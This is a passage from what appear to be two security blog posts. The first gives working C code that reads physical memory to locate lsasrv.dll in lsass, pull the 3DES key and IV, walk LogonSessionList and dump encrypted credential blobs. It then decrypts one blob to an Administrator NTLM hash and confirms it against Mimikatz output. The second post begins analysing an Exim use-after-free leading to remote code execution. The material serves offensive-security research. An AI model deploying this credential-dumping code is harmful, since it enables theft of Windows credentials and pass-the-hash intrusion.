+0x010 Vpb : 0xffffe786`e77df4c0 _VPB
+0x018 FsContext : 0xffffae0e`cd2c8170 Void
+0x020 FsContext2 : 0xffffae0e`cd2c83e0 Void
+0x028 SectionObjectPointer : 0xffffe786`ed18e7f8 _SECTION_OBJECT_POINTERS
+0x030 PrivateCacheMap : (null)
+0x038 FinalStatus : 0n0
+0x040 RelatedFileObject : (null)
+0x048 LockOperation : 0 ''
+0x049 DeletePending : 0 ''
+0x04a ReadAccess : 0x1 ''
+0x04b WriteAccess : 0 ''
+0x04c DeleteAccess : 0 ''
+0x04d SharedRead : 0x1 ''
+0x04e SharedWrite : 0 ''
+0x04f SharedDelete : 0x1 ''
+0x050 Flags : 0x44042
+0x058 FileName : _UNICODE_STRING "\Windows\System32\lsass.exe" <======== /!\
+0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
+0x070 Waiters : 0
+0x074 Busy : 0
+0x078 LastLock : (null)
+0x080 Lock : _KEVENT
+0x098 Event : _KEVENT
+0x0b0 CompletionContext : (null)
+0x0b8 IrpListLock : 0
+0x0c0 IrpList : _LIST_ENTRY [ 0xffffe786`ed195450 - 0xffffe786`ed195450 ]
+0x0d0 FileObjectExtension : (null)
Finally! At offset 0x58 there is a _UNICODE_STRING struct that contains the path to the image associated with this memory region. In order to get this info, we need to parse each node found and dive into this rollercoaster of structs, reading each pointer from the target offset. So… finally we are going to have something like:
void walkAVL(ULONGLONG VadRoot, ULONGLONG VadCount) {
/* Variables used to walk the AVL tree*/
ULONGLONG* queue;
BOOL result;
DWORD bytes_read = 0;
LARGE_INTEGER reader;
ULONGLONG cursor = 0;
ULONGLONG count = 1;
ULONGLONG last = 1;
ULONGLONG startingVpn = 0;
ULONGLONG endingVpn = 0;
ULONGLONG startingVpnHigh = 0;
ULONGLONG endingVpnHigh = 0;
ULONGLONG start = 0;
ULONGLONG end = 0;
VAD* vadList = NULL;
printf("[+] Starting to walk _RTL_AVL_TREE...\n");
queue = (ULONGLONG *)malloc(sizeof(ULONGLONG) * VadCount * 4); // Make room for our queue
queue[0] = VadRoot; // Node 0
vadList = (VAD*)malloc(VadCount * sizeof(*vadList)); // Save all the VADs in an array. We do not really need it (because we can just break when the lsasrv.dll is found) but hey... maybe we want to reuse this code in the future
while (count <= VadCount) {
ULONGLONG currentNode;
ULONGLONG left = 0;
ULONGLONG right = 0;
ULONGLONG subsection = 0;
ULONGLONG control_area = 0;
ULONGLONG filepointer = 0;
ULONGLONG fileobject = 0;
ULONGLONG filename = 0;
USHORT pathLen = 0;
LPWSTR path = NULL;
// printf("Cursor [%lld]\n", cursor);
currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
if (currentNode == 0) {
cursor++;
continue;
}
reader.QuadPart = v2p(currentNode); // Get Physical Address
left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
queue[last++] = left; //Add the new node
//printf("[<] Left: 0x%08llx\n", left);
reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
right = readPhysMemPointer(reader); //Save the pointer
queue[last++] = right; //Add the new node
//printf("[>] Right: 0x%08llx\n", right);
// Get the start address
reader.QuadPart = v2p(currentNode + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x20);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
start = (startingVpn << 12) | (startingVpnHigh << 44);
// Get the end address
reader.QuadPart = v2p(currentNode + 0x1c);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
reader.QuadPart = v2p(currentNode + 0x21);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));
//Get the pointer to Subsection (offset 0x48 of __mmvad)
reader.QuadPart = v2p(currentNode + 0x48);
subsection = readPhysMemPointer(reader);
if (subsection != 0 && subsection != 0xffffffffffffffff) {
//Get the pointer to ControlArea (offset 0 of _SUBSECTION)
reader.QuadPart = v2p(subsection);
control_area = readPhysMemPointer(reader);
if (control_area != 0 && control_area != 0xffffffffffffffff) {
//Get the pointer to FileObject (offset 0x40 of _CONTROL_AREA)
reader.QuadPart = v2p(control_area + 0x40);
fileobject = readPhysMemPointer(reader);
if (fileobject != 0 && fileobject != 0xffffffffffffffff) {
// It is an _EX_FAST_REF, so we need to clear the low 4 bits (the reference count)
fileobject = fileobject & 0xfffffffffffffff0;
//Get the path length (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING; MaximumLength, the buffer size in bytes, is at +0x2)
reader.QuadPart = v2p(fileobject + 0x58 + 0x2);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &pathLen, 2, &bytes_read, NULL);
//Get the pointer to the path name (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the pointer to the buffer is +0x08)
reader.QuadPart = v2p(fileobject + 0x58 + 0x8);
filename = readPhysMemPointer(reader);
//Save the path name
path = (LPWSTR)malloc(pathLen * sizeof(wchar_t));
reader.QuadPart = v2p(filename);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, path, pathLen * 2, &bytes_read, NULL);
}
}
}
/*printf("[0x%08llx]\n", currentNode);
printf("[!] Subsection 0x%08llx\n", subsection);
printf("[!] ControlArea 0x%08llx\n", control_area);
printf("[!] FileObject 0x%08llx\n", fileobject);
printf("[!] PathLen %d\n", pathLen);
printf("[!] Buffer with path name 0x%08llx\n", filename);
printf("[!] Path name: %S\n", path);
*/
// Save the info in our list
vadList[count - 1].id = count - 1;
vadList[count - 1].vaddress = currentNode;
vadList[count - 1].start = start;
vadList[count - 1].end = end;
vadList[count - 1].size = end - start;
memset(vadList[count - 1].image, 0, MAX_PATH);
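if (path != NULL) {
wcstombs(vadList[count - 1].image, path, MAX_PATH - 1); // Buffer was zeroed above, so it stays NUL-terminated
free(path);
path = NULL; // Avoid reusing (and double-freeing) a stale pointer on the next node
}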
count++;
cursor++;
}
//Just print the VAD list
printf("\t\t===================[VAD info]===================\n");
for (int i = 0; i < VadCount; i++) {
printf("[%lld] (0x%08llx) [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].id, vadList[i].vaddress, vadList[i].start, vadList[i].end, vadList[i].size);
if (vadList[i].image[0] != 0) {
printf(" |\n +---->> %s\n", vadList[i].image);
}
}
printf("\t\t================================================\n");
for (int i = 0; i < VadCount; i++) {
if (!strcmp(vadList[i].image, "\\Windows\\System32\\lsasrv.dll")) { // Is this our target?
printf("[!] LsaSrv.dll found! [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].start, vadList[i].end, vadList[i].size);
// TODO lootLsaSrv(vadList[i].start, vadList[i].end, vadList[i].size);
break;
}
}
free(vadList);
free(queue);
return;
}
This looks like…
(...)
[161] (0xffffa48baf677ba0) [0x7ff8122b0000-0x7ff8122e0000] (196608 bytes)
|
+---->> \Windows\System32\CertPolEng.dll
[162] (0xffffa48bb1f640a0) [0x7ff8183e0000-0x7ff818422000] (270336 bytes)
|
+---->> \Windows\System32\ngcpopkeysrv.dll
[163] (0xffffa48bb1f63ce0) [0x7ff83df10000-0x7ff83df2a000] (106496 bytes)
|
+---->> \Windows\System32\tbs.dll
[164] (0xffffa48bb1f66a80) [0x7ff83e270000-0x7ff83e2e3000] (471040 bytes)
|
+---->> \Windows\System32\cryptngc.dll
================================================
[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)
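The address arithmetic used above to turn the VAD fields into a virtual address range can be checked in isolation. The following is a minimal Python sketch, not part of the tool: the function name is made up, and the four field values are assumptions picked so that they reproduce the lsasrv.dll range printed above.

```python
PAGE_SHIFT = 12  # 4 KiB pages


def vad_range(starting_vpn, starting_vpn_high, ending_vpn, ending_vpn_high):
    """Combine the 32-bit VPN fields and their 8-bit "high" parts into addresses."""
    start = (starting_vpn << PAGE_SHIFT) | (starting_vpn_high << 44)
    # EndingVpn is the last page of the region, so add one page to get the end address.
    end = ((ending_vpn + 1) << PAGE_SHIFT) | (ending_vpn_high << 44)
    return start, end


# Assumed field values: low 32 bits of the VPN plus the high byte.
start, end = vad_range(0xFF845130, 0x07, 0xFF8452CD, 0x07)
print(hex(start), hex(end), end - start)
```

Python integers do not overflow, which is why no widening is needed here. In C the same expression only works if the operands are 64-bit before the shift.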
To recap at this point we:
This time we are only interested in retrieving NTLM hashes, so we are going to implement something like sekurlsa::msv from Mimikatz as a PoC (once we have located the process memory and its modules, it is trivial to imitate any functionality from Mimikatz, so I picked the quickest one to implement).
This is well explained in the article “Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD” from Matteo Malvica, so it is redundant to explain it again here… but in essence we are going to search for signatures inside lsasrv.dll and then retrieve the info needed to locate the LogonSessionList struct and the crypto keys/IVs. Another good related article to read is “Exploring Mimikatz - Part 1 - WDigest” by @xpn.
As I am imitating the post from Matteo Malvica, I am going to retrieve only the cryptoblob encrypted with Triple-DES. Here is our shitty code:
void lootLsaSrv(ULONGLONG start, ULONGLONG end, ULONGLONG size) {
LARGE_INTEGER reader;
DWORD bytes_read = 0;
LPSTR lsasrv = NULL;
ULONGLONG cursor = 0;
ULONGLONG lsasrv_size = 0;
ULONGLONG original = 0;
BOOL result;
ULONGLONG LogonSessionListCount = 0;
ULONGLONG LogonSessionList = 0;
ULONGLONG LogonSessionList_offset = 0;
ULONGLONG LogonSessionListCount_offset = 0;
ULONGLONG iv_offset = 0;
ULONGLONG hDes_offset = 0;
ULONGLONG DES_pointer = 0;
unsigned char* iv_vector = NULL;
unsigned char* DES_key = NULL;
KIWI_BCRYPT_HANDLE_KEY h3DesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey;
LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 };
LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
PBYTE LsaInitialize_needle_buffer = NULL;
PBYTE needle_buffer = NULL;
int offset_LsaInitialize_needle = 0;
int offset_LogonSessionList_needle = 0;
ULONGLONG currentElem = 0;
original = start;
/* Save the whole region in a buffer */
lsasrv = (LPSTR)malloc(size);
while (start < end) {
DWORD bytes_read = 0;
DWORD bytes_written = 0;
CHAR tmp = 0;
reader.QuadPart = v2p(start);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &tmp, 1, &bytes_read, NULL);
lsasrv[cursor] = tmp;
cursor++;
start = original + cursor;
}
lsasrv_size = cursor;
// Use mimikatz signatures to find the IV/keys
printf("\t\t===================[Crypto info]===================\n");
LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE));
memcpy(LsaInitialize_needle_buffer, &LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE));
offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE));
printf("[*] Offset for InitializationVector/h3DesKey/hAesKey is %d\n", offset_LsaInitialize_needle);
memcpy(&iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4); //IV offset
printf("[*] IV Vector relative offset: 0x%08llx\n", iv_offset);
iv_vector = (unsigned char*)malloc(16);
memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16);
printf("\t\t[/!\\] IV Vector: ");
for (int i = 0; i < 16; i++) {
printf("%02x", iv_vector[i]);
}
printf(" [/!\\]\n");
free(iv_vector);
memcpy(&hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); //DES KEY offset
printf("[*] 3DES Handle Key relative offset: 0x%08llx\n", hDes_offset);
reader.QuadPart = v2p(original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset);
DES_pointer = readPhysMemPointer(reader);
printf("[*] 3DES Handle Key pointer: 0x%08llx\n", DES_pointer);
reader.QuadPart = v2p(DES_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY), &bytes_read, NULL);
reader.QuadPart = v2p((ULONGLONG)h3DesKey.key);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY81), &bytes_read, NULL);
DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret);
memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
printf("\t\t[/!\\] 3DES Key: ");
for (int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x", DES_key[i]);
}
printf(" [/!\\]\n");
free(DES_key);
printf("\t\t================================================\n");
needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE));
memcpy(needle_buffer, &LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE));
offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE));
memcpy(&LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4);
printf("[*] LogonSessionList Relative Offset: 0x%08llx\n", LogonSessionList_offset);
LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset;
printf("[*] LogonSessionList: 0x%08llx\n", LogonSessionList);
reader.QuadPart = v2p(LogonSessionList);
printf("\t\t===================[LogonSessionList]===================");
while (currentElem != LogonSessionList) {
if (currentElem == 0) {
currentElem = LogonSessionList;
}
reader.QuadPart = v2p(currentElem);
currentElem = readPhysMemPointer(reader);
//printf("Element at: 0x%08llx\n", currentElem);
USHORT length = 0;
LPWSTR username = NULL;
ULONGLONG username_pointer = 0;
reader.QuadPart = v2p(currentElem + 0x90); //UNICODE_STRING = USHORT Length, USHORT MaximumLength, LPWSTR Buffer
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &length, 2, &bytes_read, NULL); //Read Length field
username = (LPWSTR)malloc(length + 2);
memset(username, 0, length + 2);
reader.QuadPart = v2p(currentElem + 0x98);
username_pointer = readPhysMemPointer(reader); //Read LPWSTR
reader.QuadPart = v2p(username_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, username, length, &bytes_read, NULL); //Read string at LPWSTR
wprintf(L"\n[+] Username: %s \n", username);
free(username);
ULONGLONG credentials_pointer = 0;
reader.QuadPart = v2p(currentElem + 0x108);
credentials_pointer = readPhysMemPointer(reader);
if (credentials_pointer == 0) {
printf("[+] Cryptoblob: (empty)\n");
continue;
}
printf("[*] Credentials Pointer: 0x%08llx\n", credentials_pointer);
ULONGLONG primaryCredentials_pointer = 0;
reader.QuadPart = v2p(credentials_pointer + 0x10);
primaryCredentials_pointer = readPhysMemPointer(reader);
printf("[*] Primary credentials Pointer: 0x%08llx\n", primaryCredentials_pointer);
USHORT cryptoblob_size = 0;
reader.QuadPart = v2p(primaryCredentials_pointer + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &cryptoblob_size, sizeof(cryptoblob_size), &bytes_read, NULL); // Read only 2 bytes: the destination is a USHORT
if (cryptoblob_size % 8 != 0) {
printf("[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\n");
continue;
}
printf("[*] Cryptoblob size: 0x%x\n", cryptoblob_size);
ULONGLONG cryptoblob_pointer = 0;
reader.QuadPart = v2p(primaryCredentials_pointer + 0x20);
cryptoblob_pointer = readPhysMemPointer(reader);
//printf("Cryptoblob pointer: 0x%08llx\n", cryptoblob_pointer);
unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size);
reader.QuadPart = v2p(cryptoblob_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, cryptoblob, cryptoblob_size, &bytes_read, NULL);
printf("[+] Cryptoblob:\n");
for (int i = 0; i < cryptoblob_size; i++) {
printf("%02x", cryptoblob[i]);
}
printf("\n");
free(cryptoblob); // Release the per-session buffer before moving to the next element
}
printf("\t\t================================================\n");
free(LsaInitialize_needle_buffer);
free(needle_buffer);
free(lsasrv);
}
If you wonder why I am not calling the Windows API to decrypt the info… It was 4:00 AM when we wrote this :(. Anyway, fire in the hole!
[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)
===================[Crypto info]===================
[*] Offset for InitializationVector/h3DesKey/hAesKey is 305033
[*] IV Vector relative offset: 0x0013be98
[/!\] IV Vector: d2e23014c6608529132d0f21144ee0df [/!\]
[*] 3DES Handle Key relative offset: 0x0013bf4c
[*] 3DES Handle Key pointer: 0x1d4d3610000
[/!\] 3DES Key: 46bca8b85491846f5c7fb42700287d0437c49c15e7b76280 [/!\]
================================================
[*] LogonSessionList Relative Offset: 0x0012b0f1
[*] LogonSessionList: 0x7ff8452b52a0
===================[LogonSessionList]===================
[+] Username: Administrador
[*] Credentials Pointer: 0x1d4d3ba96c0
[*] Primary credentials Pointer: 0x1d4d3ae49f0
[*] Cryptoblob size: 0x1b0
[+] Cryptoblob:
f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a
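The signature search in lootLsaSrv() boils down to one step repeated three times: find a byte pattern, read the 4-byte displacement stored a fixed distance from it, and add that displacement to the address of the next instruction byte. Below is a minimal Python sketch of that step run against a synthetic buffer. The helper name, the buffer contents, and the displacement value are assumptions for illustration; only the needle bytes and the 0x17 offset come from the code above.

```python
import struct


def resolve_rip_relative(image, base, needle, disp_offset):
    """Return the absolute address referenced by a RIP-relative operand.

    image: bytes of the module, base: its virtual base address,
    needle: signature to locate, disp_offset: distance from the signature
    to the 4-byte displacement.
    """
    hit = image.find(needle)
    if hit < 0:
        raise ValueError("signature not found")
    disp_pos = hit + disp_offset
    # x86-64 encodes the displacement as a signed little-endian 32-bit value.
    (disp,) = struct.unpack_from("<i", image, disp_pos)
    # The displacement is relative to the byte right after the 4-byte operand.
    return base + disp_pos + 4 + disp


# Synthetic module: the needle at offset 0x40 and a displacement of 0x100.
needle = bytes([0x33, 0xFF, 0x41, 0x89, 0x37, 0x4C, 0x8B, 0xF3, 0x45, 0x85, 0xC0, 0x74])
image = bytearray(0x200)
image[0x40:0x40 + len(needle)] = needle
struct.pack_into("<i", image, 0x40 + 0x17, 0x100)

addr = resolve_rip_relative(bytes(image), 0x7FF845130000, needle, 0x17)
print(hex(addr))
```

Reading the displacement as signed matters when the referenced data sits before the instruction. The C code copies the four bytes into an unsigned 64-bit variable, which only gives the right result for positive displacements such as the ones in the output above.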
Let’s decrypt with Python (yeah, we know, we are the worst :()
>>> from pyDes import *
>>> k = triple_des("46bca8b85491846f5c7fb42700287d0437c49c15e7b76280".decode("hex"), CBC, "\x00\x0d\x56\x99\x63\x93\x95\xd0")
>>> k.decrypt("f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a".decode("hex"))[74:90].encode("hex")
'191d643eca7a6b94a3b6df1469ba2846'
We can check that the Administrador’s NTLM hash is indeed 191d643eca7a6b94a3b6df1469ba2846:
C:\Windows\system32>C:\Users\ortiga.japonesa\Downloads\mimikatz-master\mimikatz-master\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 8 2021 00:30:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # sekurlsa::msv
[!] LogonSessionListCount: 0x7ff8452b4be0
[!] LogonSessionList: 0x7ff8452b52a0
[!] Data Address: 0x1d4d3bfb5c0
Authentication Id : 0 ; 120327884 (00000000:072c0ecc)
Session : CachedInteractive from 1
User Name : Administrador
Domain : ACUARIO
Logon Server : WIN-UQ1FE7E6SES
Logon Time : 08/05/2021 0:44:32
SID : S-1-5-21-3039666266-3544201716-3988606543-500
msv :
[00000003] Primary
* Username : Administrador
* Domain : ACUARIO
* NTLM : 191d643eca7a6b94a3b6df1469ba2846
* SHA1 : 5f041d6e1d3d0b3f59d85fa7ff60a14ae1a5963d
* DPAPI : b4772e37b9a6a10785ea20641c59e5b2
MMmm… that PtH smell…
Playing with Windows Internals and reading Mimikatz code is a nice exercise to learn and practice new things. As we said at the beginning, this approach is probably not the best (our knowledge on this topic is limited), so if you spot errors/misconceptions/typos please contact us so we can fix them.
The code can be found in our repo as SnoopyOwl.
We hope you enjoyed this reading! Feel free to give us feedback on Twitter at @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about building a PoC for one of the vulnerabilities published by Qualys in Exim. Please, take a seat and listen to the story.
Qualys recently released an advisory named “21Nails” with 21 vulnerabilities discovered in Exim, some leading to LPE and RCE.
This post will analyze one of those vulnerabilities, CVE-2020-28018.
The vulnerability is a Use-After-Free (UAF) in tls-openssl.c that leads to Remote Code Execution.
This vulnerability is really powerful as it allows an attacker to craft important primitives to bypass memory protections like PIE or ASLR.
The primitives that this vulnerability can achieve are the following:
As you can see, those primitives are just what a remote attacker needs to bypass security protections.
First, for this vulnerability to be triggered and exploited, some requirements need to be met:
- X_PIPE_CONNECT should be disabled
First, to understand why this vulnerability exists and how to exploit it, we need to understand the behaviour of the Exim pool allocator and the growable strings Exim uses.
The Exim pool allocator has different pools:
- POOL_PERM: Allocations that are not released until the process finishes
- POOL_MAIN: Allocations that can be freed
- POOL_SEARCH: Lookup storage
A pool is a linked list of storeblock structures starting from the chainbase.
typedef struct storeblock {
struct storeblock *next;
size_t length;
} storeblock;
We can see it contains two entries:
- next: Pointer to the next block within the linked list.
- length: Length of current block.
void *
store_get_3(int size, const char *filename, int linenumber)
{
if (size % alignment != 0) size += alignment - (size % alignment);
if (size > yield_length[store_pool])
{
int length = (size <= STORE_BLOCK_SIZE)? STORE_BLOCK_SIZE : size;
int mlength = length + ALIGNED_SIZEOF_STOREBLOCK;
storeblock * newblock = NULL;
if ( (newblock = current_block[store_pool])
&& (newblock = newblock->next)
&& newblock->length < length
)
{
/* Give up on this block, because it's too small */
store_free(newblock);
newblock = NULL;
}
if (!newblock)
{
pool_malloc += mlength; /* Used in pools */
nonpool_malloc -= mlength; /* Exclude from overall total */
newblock = store_malloc(mlength);
newblock->next = NULL;
newblock->length = length;
if (!chainbase[store_pool])
chainbase[store_pool] = newblock;
else
current_block[store_pool]->next = newblock;
}
current_block[store_pool] = newblock;
yield_length[store_pool] = newblock->length;
next_yield[store_pool] =
(void *)(CS current_block[store_pool] + ALIGNED_SIZEOF_STOREBLOCK);
(void) VALGRIND_MAKE_MEM_NOACCESS(next_yield[store_pool], yield_length[store_pool]);
}
store_last_get[store_pool] = next_yield[store_pool];
...
next_yield[store_pool] = (void *)(CS next_yield[store_pool] + size);
yield_length[store_pool] -= size;
return store_last_get[store_pool];
}
When store_get() is called, it first checks whether there is enough space in the current block to satisfy the request.
If there is space, the yield pointer is updated and a pointer to the memory is returned to the calling function.
If there is no space, it checks whether there is a free block and, as a last resort, calls malloc() to satisfy the request (the allocation is at least STORE_BLOCK_SIZE; if the request is smaller than that, STORE_BLOCK_SIZE is used as the size for the allocation).
Finally, the new block is added to the pool's linked list.
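The behaviour just described can be modelled with a toy bump allocator. This is a simplified Python sketch under stated assumptions, not Exim's implementation: the ALIGNMENT and STORE_BLOCK_SIZE values are illustrative, addresses are fake, and reuse of an already allocated next block is left out.

```python
ALIGNMENT = 8            # assumption: typical value on 64-bit builds
STORE_BLOCK_SIZE = 8192  # assumption: illustrative value only


class Pool:
    """Toy bump allocator: each block is a (base_address, length) pair."""

    def __init__(self):
        self.blocks = []          # stand-in for the storeblock linked list
        self.next_yield = 0       # next free address in the current block
        self.yield_length = 0     # bytes left in the current block
        self._next_base = 0x1000  # fake addresses handed out by "malloc"

    def get(self, size):
        # Round the request up to the alignment, as store_get_3() does.
        if size % ALIGNMENT:
            size += ALIGNMENT - (size % ALIGNMENT)
        if size > self.yield_length:
            # Not enough room: take a new block of at least STORE_BLOCK_SIZE.
            length = max(size, STORE_BLOCK_SIZE)
            base = self._next_base
            self._next_base += length + 0x100  # arbitrary gap between blocks
            self.blocks.append((base, length))
            self.next_yield = base
            self.yield_length = length
        ptr = self.next_yield
        self.next_yield += size
        self.yield_length -= size
        return ptr


pool = Pool()
a = pool.get(13)    # rounded up to 16
b = pool.get(100)   # rounded up to 104, served from the same block
c = pool.get(9000)  # does not fit in what is left: a second block is created
print(hex(a), hex(b), hex(c), len(pool.blocks))
```

The point to take away is that consecutive allocations are adjacent in memory, which is what makes the heap layout predictable later on.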
void
store_reset_3(void *ptr, const char *filename, int linenumber)
{
storeblock * bb;
storeblock * b = current_block[store_pool];
char * bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
int newlength;
store_last_get[store_pool] = NULL;
if (CS ptr < bc || CS ptr > bc + b->length)
{
for (b = chainbase[store_pool]; b; b = b->next)
{
bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
if (CS ptr >= bc && CS ptr <= bc + b->length) break;
}
if (!b)
log_write(0, LOG_MAIN|LOG_PANIC_DIE, "internal error: store_reset(%p) "
"failed: pool=%d %-14s %4d", ptr, store_pool, filename, linenumber);
}
newlength = bc + b->length - CS ptr;
...
(void) VALGRIND_MAKE_MEM_NOACCESS(ptr, newlength);
yield_length[store_pool] = newlength - (newlength % alignment);
next_yield[store_pool] = CS ptr + (newlength % alignment);
current_block[store_pool] = b;
if (yield_length[store_pool] < STOREPOOL_MIN_SIZE &&
b->next &&
b->next->length == STORE_BLOCK_SIZE)
{
b = b->next;
...
(void) VALGRIND_MAKE_MEM_NOACCESS(CS b + ALIGNED_SIZEOF_STOREBLOCK,
b->length - ALIGNED_SIZEOF_STOREBLOCK);
}
bb = b->next;
b->next = NULL;
while ((b = bb))
{
...
bb = bb->next;
pool_malloc -= b->length + ALIGNED_SIZEOF_STOREBLOCK;
store_free_3(b, filename, linenumber);
}
...
}
Store reset performs a reset / free given a reset point. All blocks after the one that contains the reset_point are freed. Finally, the yield pointer is restored to the reset point within that block.
BOOL
store_extend_3(void *ptr, int oldsize, int newsize, const char *filename,
int linenumber)
{
int inc = newsize - oldsize;
int rounded_oldsize = oldsize;
if (rounded_oldsize % alignment != 0)
rounded_oldsize += alignment - (rounded_oldsize % alignment);
if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
inc > yield_length[store_pool] + rounded_oldsize - oldsize)
return FALSE;
...
if (newsize % alignment != 0) newsize += alignment - (newsize % alignment);
next_yield[store_pool] = CS ptr + newsize;
yield_length[store_pool] -= newsize - rounded_oldsize;
(void) VALGRIND_MAKE_MEM_UNDEFINED(ptr + oldsize, inc);
return TRUE;
}
As we will see later with gstrings, this function tries to extend an allocation within the same block if space is available.
